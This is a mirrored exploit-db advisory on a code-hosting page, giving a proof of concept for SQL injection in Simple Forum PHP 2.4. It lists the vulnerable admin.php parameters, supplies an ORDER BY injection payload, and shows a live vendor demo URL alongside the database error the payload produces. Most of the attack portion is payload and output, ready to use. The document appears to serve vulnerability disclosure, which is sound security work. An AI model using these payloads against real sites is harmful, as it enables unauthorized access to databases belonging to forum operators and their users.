bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40531.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

30 lines
No EOL
1.1 KiB
Text
Raw Blame History

=====================================================
# Simple Forum PHP 2.4 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/forum/admin.php?act=replies&topic_id=[payload]
http://localhost/forum/admin.php?act=editTopic&id=[payload]
Vulnerable parameter : topic_id , id
Mehod : GET
A simple inject :
Payload : '+order+by+100--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
In response can see result :
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'
Result of payload: Error: Unknown column '100' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
Reference in a new issue View git blame Copy permalink